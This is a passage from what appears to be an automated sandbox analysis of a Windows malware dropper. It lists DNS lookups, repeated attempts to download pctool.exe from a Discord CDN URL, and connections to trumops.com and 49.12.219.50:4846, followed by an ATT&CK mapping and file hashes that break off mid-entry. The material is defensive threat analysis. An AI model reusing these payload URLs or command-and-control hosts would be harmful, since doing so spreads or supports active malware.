Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SapquCjvU%2BltE2Lv8e77LiqPMQViYppaAAZpUQlt1IrFa5tvbqntpm3%2F5vysl1PIuovk2tdJNm%2FBt6E%2FtzsgbFFWieVC69dUPFKPcHRRmbVXxr2ZsPOhpBPx0vQrslq53IWXw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: _cfuvid=U5M7L_uCDzw4T8Cwd5HVUGkV7sNpetKueO0mx3acn8s-1734985327809-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f6b0fdab8e171ea-LHR
alt-svc: h3=":443"; ma=86400
DNS

74.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.32.126.40.in-addr.arpa

IN PTR

Response
DNS

233.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.135.159.162.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

trumops.com

csrss.exe

Remote address:

8.8.8.8:53

Request

trumops.com

IN TXT

Response

trumops.com

IN TXT

.v=spf1 include:_incspfcheck.mailspike.net ?all
DNS

retoti.com

csrss.exe

Remote address:

8.8.8.8:53

Request

retoti.com

IN TXT

Response

retoti.com

IN TXT

.v=spf1 include:_incspfcheck.mailspike.net ?all
DNS

logs.trumops.com

csrss.exe

Remote address:

8.8.8.8:53

Request

logs.trumops.com

IN TXT

Response
DNS

logs.retoti.com

csrss.exe

Remote address:

8.8.8.8:53

Request

logs.retoti.com

IN TXT

Response
DNS

228.249.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
DNS

a2f09428-5d0d-4660-8a86-fab88fb4bc2e.uuid.trumops.com

csrss.exe

Remote address:

8.8.8.8:53

Request

a2f09428-5d0d-4660-8a86-fab88fb4bc2e.uuid.trumops.com

IN TXT

Response
DNS

server10.trumops.com

csrss.exe

Remote address:

8.8.8.8:53

Request

server10.trumops.com

IN A

Response

server10.trumops.com

IN A

44.221.84.105
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

105.84.221.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

105.84.221.44.in-addr.arpa

IN PTR

Response

105.84.221.44.in-addr.arpa

IN PTR

ec2-44-221-84-105 compute-1 amazonawscom
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

56.jpgamehome.com

Tue20c0a313caa25872.exe

Remote address:

8.8.8.8:53

Request

56.jpgamehome.com

IN A

Response
DNS

93.65.42.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

93.65.42.20.in-addr.arpa

IN PTR

Response

162.159.135.233:443

https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

tls, http

Tue20c64a1a28623ee7.exe

6.9kB
37.0kB
63
39

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404

HTTP Request

GET https://cdn.discordapp.com/attachments/910281601559167006/912610248508968970/pctool.exe

HTTP Response

404
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
44.221.84.105:443

server10.trumops.com

tls

csrss.exe

14.5kB
9.6kB
30
25
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
44.221.84.105:443

server10.trumops.com

tls

csrss.exe

1.7kB
5.3kB
9
9
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

260 B
200 B
5
5
49.12.219.50:4846

Tue20acc89cbd449e95d.exe

104 B
80 B
2
2

8.8.8.8:53

196.249.167.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

196.249.167.52.in-addr.arpa
8.8.8.8:53

88.210.23.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

88.210.23.2.in-addr.arpa
8.8.8.8:53

cdn.discordapp.com

dns

Tue20c64a1a28623ee7.exe

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.135.233

162.159.129.233

162.159.133.233

162.159.130.233

162.159.134.233
8.8.8.8:53

74.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

74.32.126.40.in-addr.arpa
8.8.8.8:53

233.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.135.159.162.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

trumops.com

dns

csrss.exe

57 B
116 B
1
1

DNS Request

trumops.com
8.8.8.8:53

retoti.com

dns

csrss.exe

56 B
115 B
1
1

DNS Request

retoti.com
8.8.8.8:53

logs.trumops.com

dns

csrss.exe

62 B
121 B
1
1

DNS Request

logs.trumops.com
8.8.8.8:53

logs.retoti.com

dns

csrss.exe

61 B
120 B
1
1

DNS Request

logs.retoti.com
8.8.8.8:53

228.249.119.40.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

228.249.119.40.in-addr.arpa
8.8.8.8:53

a2f09428-5d0d-4660-8a86-fab88fb4bc2e.uuid.trumops.com

dns

csrss.exe

99 B
158 B
1
1

DNS Request

a2f09428-5d0d-4660-8a86-fab88fb4bc2e.uuid.trumops.com
8.8.8.8:53

server10.trumops.com

dns

csrss.exe

66 B
82 B
1
1

DNS Request

server10.trumops.com

DNS Response

44.221.84.105
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

105.84.221.44.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

105.84.221.44.in-addr.arpa
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

53.210.109.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

53.210.109.20.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

19.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.229.111.52.in-addr.arpa
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

56.jpgamehome.com

dns

Tue20c0a313caa25872.exe

63 B
136 B
1
1

DNS Request

56.jpgamehome.com
8.8.8.8:53

93.65.42.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

93.65.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue20acc89cbd449e95d.exe.log

Filesize
700B

MD5
e5352797047ad2c91b83e933b24fbc4f

SHA1
9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

SHA256
b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

SHA512
dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
b51bf9eca2e7e7d15279ce30db09b753

SHA1
a772a72c763836b56bf5f68bf1254a277ab3ff58

SHA256
79ebdcae822339e3c92470f3b6b4ffe20ed29418ebe19e1b51d166be1828e59d

SHA512
9ac4793686cf567f09e53d36134541b3bb654f630d1844ba07014fffe516eaa45d6842eaca9109e08eaaab6ecd6b9a703bae58fe21343c35af59732bdf617dab

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20177cabec2a.exe

Filesize
383KB

MD5
5eec35ae4619a7992130f13f66b03002

SHA1
47141ead2a1166234970c3dba5821cee57ddbb4d

SHA256
947efb32f120d30758ff6801dd1118922cff317411e87906aa9153fe928b1156

SHA512
5f8ae8110b7aa626cf1002f1f214ccc2fd09956cb9d2d82d31115adee356ffd529d1eef4f32a2f193fd862029f930ad01f068b22335d61a00ae5b25106c0590a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue2025487c6c276c3.exe

Filesize
1.4MB

MD5
18b59e79ac40c081b719c1b8d6c6cf32

SHA1
ec01215c5e5eac7149a0777a98d15575df29676c

SHA256
7a0fb647c62e46b48095bb37e4a4750288ad5d062f34121769acd94cb864a478

SHA512
b491a781b3346eed93ebfe3c7247ef46cdf53a2e6ead6d800c229d4a65cc2a641f15b509560bf58e7f604b1f280159c95787084b8a8defd849ed7d5e4ce2dab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue202def121e32deb35.exe

Filesize
294KB

MD5
5d30047ee5db838529168e7a970d98e2

SHA1
864e94db65e6c1c52e063184d2da2b07a3be4a41

SHA256
c6cf65fa806ea759cd9141c844815ad45ac6e6b03cb4aa50b2bd8963b19ef161

SHA512
88ad9bf1f5ab4dfed6bb3c581df4576841e5bb03cfc8700b6331b49058d39a8a5edc9d9e5efb4ad2b5fbe656de143fd0ee1a27655e3aefb8f0247a96cfecbbd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue2032d2e78e3d4a56.exe

Filesize
379KB

MD5
314e3dc1f42fb9d858d3db84deac9343

SHA1
dec9f05c3bcc759b76f4109eb369db9c9666834b

SHA256
79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08

SHA512
23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue2042f82e3d3979159.exe

Filesize
1.7MB

MD5
8ddac734c2d77bab23f64e46daf14825

SHA1
0676db42d4beaf136a86959e25aa7ec0108da1a5

SHA256
e9eaff773b37f538b1b8b41a568d045cb510edbf221fead512d765d7df0f9e3a

SHA512
ff9f9d9046292e5ba9bd7e4e8433f8d922d839c2d6b007f41a8c81bf3bc0f1980c296870d3dfcce27261589b9d0d6a9b94453055c501d7d759cd04f96d0040c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue205ff5cb98.exe

Filesize
126KB

MD5
cd6d011a663a12f81ba8e4e5407e3a6f

SHA1
53c81876f0ff422d41f19c6d2ea0d30548e4e071

SHA256
c303cb56a1c37e081b25cfec6b61829205cdd473deafed698bf725ca55a5b7a1

SHA512
8b3228f725a3f49ab34bd36f09589ce682d1115acd212f9b6818708d59b263d9b83ec8e475f917df349449d5126a06ac1a55063f2946842639c0194412482738

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue2066325c078.exe

Filesize
1.9MB

MD5
b84f79adfccd86a27b99918413bb54ba

SHA1
06a61ab105da65f78aacdd996801c92d5340b6ca

SHA256
6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49

SHA512
99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue2069ccb821.exe

Filesize
625KB

MD5
4f11e641d16d9590ac1c9f70d215050a

SHA1
75688f56c970cd55876f445c8319d7b91ce556fb

SHA256
efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0

SHA512
b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue207aa8a73892eeac.exe

Filesize
1.4MB

MD5
8268aa1cba3763a79c3dd333ab42c093

SHA1
e7d034e6f55bc07b38ad50f5bb2e83f098c60c97

SHA256
7f6eef3d7d271decfd078c27b125d8c06dcd3a920f0e9edf8edf229ee1b2012f

SHA512
271797ad106169e7bbed9b70187d8b643ed7d164b7ed0049d3656334899ccb1bd19e4a4ec2fab9d5f00cad718a5248cf78ac976d9c032665d6758a2f8dd91195

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue2089e53e7fc7158da.exe

Filesize
393KB

MD5
d467d372ca2ff1c8dcad54da399c09d9

SHA1
79d9769742dc9f52c7623a96aea6560284ee2345

SHA256
bcf196a4c0a3c6b1fe697f30c6b33c8215701f2c98deec8e09530c622758b799

SHA512
6df383fcc8c3db9f30f78b8f5b0d0bf12097f5807c5b22d4f115137386684a6f0b7ab9c7c4425ddb3ef1146bdfc300a797e4df41632b50acbb620a0f53dfc8f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20acc89cbd449e95d.exe

Filesize
391KB

MD5
c7cd0def6982f7b281c6a61d29eec4be

SHA1
f9f600d70d60cf79563e84cec0b883fa3f541690

SHA256
b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9

SHA512
370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20c0a313caa25872.exe

Filesize
76KB

MD5
99471e8043cb5f141962e1cfe12d44f4

SHA1
57c6baf415f892dfa82c206c1380a34130dad19d

SHA256
1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509

SHA512
a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20c64a1a28623ee7.exe

Filesize
8KB

MD5
3476b903e6e6ff5f246460e8749fd232

SHA1
3639e6c1f104ad7aa24ab7f72aca5dad686361cf

SHA256
25cbf20f43b95afac49543b0dd5378626ab2c78f5edadd781441b335f9fc1002

SHA512
ac99a88b90e1396b2a8db98e56eb350ad95a8f8faa5b7b36862f603899aa9a8bd2a69d5abf3346158c6605f3475b4ab3366c644c7ab23dd5e436cc8951d0e026

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20cb62eb1a4cb3a01.exe

Filesize
4.3MB

MD5
f283ac3ee21ba25e7a192dd89380ec45

SHA1
2b286463a55ccec186a2ab17d9d3ee032925eb9f

SHA256
1ad65db0dc93eff742bafe3ba4cbd996d0821280be35c44056d38963408f7da2

SHA512
df0207c68772378b7271f8ee55a4a0fa8146c04e1eb1d58cfb917b3b34d11ceb6725c4f38afffffe300190a05e0ffa19bd9d0a4c1170d7214111d2aebee5409e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\Tue20cceb49d9a7.exe

Filesize
1.2MB

MD5
22c90797f0fcd5308ce9454001263d8d

SHA1
1dec527d6f33e583e66459a9f646049bf8bb63b1

SHA256
ef13f310e3e72a96feecc6768f5997e5b89651bf56b1958bebcfafb33f0fb036

SHA512
37bd42020137134f67e16d2abe9fcbd34d2d9e9dacb914747f67d4add7913f95b3fa6afcb4a93ea68443efecd041c13300a830d06fd2b165ddc69b2c3dd41fbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\libcurl.dll

Filesize
218KB

MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS42925387\libcurlpp.dll

Filesize
54KB

MD5
